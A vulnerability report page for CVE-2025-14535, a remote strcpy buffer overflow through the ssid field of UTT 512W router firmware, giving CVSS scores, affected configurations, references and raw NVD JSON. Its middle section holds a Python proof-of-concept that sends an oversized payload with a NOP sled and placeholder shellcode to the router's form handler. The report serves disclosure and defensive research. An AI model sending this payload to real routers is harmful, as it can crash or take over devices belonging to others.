Security Vulnerability Report
CVE-2025-14535 CVSS 9.8 CRITICAL

Published: 2025-12-11 20:15:55
Last Modified: 2026-01-07 20:59:29

Description

A vulnerability was identified in UTT 进取 512W up to 3.1.7.7-171114. Affected is the function strcpy of the file /goform/formConfigFastDirectionW. The manipulation of the argument ssid leads to buffer overflow. The attack may be initiated remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:utt:512w_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:utt:512w:3.0:*:*:*:*:*:*:* - NOT VULNERABLE
UTT 进取 512W < 3.1.7.7-171114
UTT 进取 512W firmware up to 3.1.7.7-171114

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-14535 PoC - UTT 进取 512W Buffer Overflow
Target: /goform/formConfigFastDirectionW
Vulnerability: strcpy buffer overflow via ssid parameter
"""
import requests
import sys

TARGET = "http://192.168.1.1"  # Router default IP
ENDPOINT = "/goform/formConfigFastDirectionW"


def create_overflow_payload(length=1000):
    """Generate overflow payload with NOP sled and shellcode"""
    # NOP sled for better exploitation reliability
    nop_sled = b'\x90' * 200
    # Minimal shellcode - spawn shell (may need adjustment for target architecture)
    # This is a placeholder - actual shellcode depends on target CPU architecture (MIPS typically)
    shellcode = b'\xcc' * 100  # INT3 for debugging
    padding = b'A' * (length - len(nop_sled) - len(shellcode))
    return nop_sled + shellcode + padding


def exploit_buffer_overflow(target_ip):
    """Send malicious request to trigger buffer overflow"""
    url = f"http://{target_ip}{ENDPOINT}"
    # Create overflow payload
    payload = {
        'ssid': create_overflow_payload(1000),
        'action': 'save'
    }
    print(f"[*] Sending exploit payload to {url}")
    print(f"[*] Payload length: {len(payload['ssid'])} bytes")
    try:
        response = requests.post(url, data=payload, timeout=10)
        print(f"[*] Response status: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[+] Exploit sent - device may be crashed or exploited")
        print(f"[*] Error: {e}")


if __name__ == "__main__":
    if len(sys.argv) > 1:
        target = sys.argv[1]
    else:
        target = "192.168.1.1"
    exploit_buffer_overflow(target)

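References

https://github.com/maximdevere/CVE2/issues/7 (Exploit, Issue Tracking, Third Party Advisory)
https://vuldb.com/?ctiid.335874 (Permissions Required, VDB Entry)
https://vuldb.com/?id.335874 (Third Party Advisory, VDB Entry)
https://vuldb.com/?submit.703621 (Third Party Advisory, VDB Entry)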

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14535", "sourceIdentifier": "[email protected]", "published": "2025-12-11T20:15:54.530", "lastModified": "2026-01-07T20:59:28.983", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in UTT 进取 512W up to 3.1.7.7-171114. Affected is the function strcpy of the file /goform/formConfigFastDirectionW. The manipulation of the argument ssid leads to buffer overflow. The attack may be initiated remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.9, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", 
"Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "baseScore": 10.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:utt:512w_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.7.7-171114", "matchCriteriaId": "962A8F4C-6C57-4682-AF35-16B98ABE7890"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:utt:512w:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "43C0782C-5F34-44B8-9A45-DF3A6121D668"}]}]}], "references": [{"url": "https://github.com/maximdevere/CVE2/issues/7", "source": "[email protected]", "tags": ["Exploit", 
"Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.335874", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.335874", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.703621", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}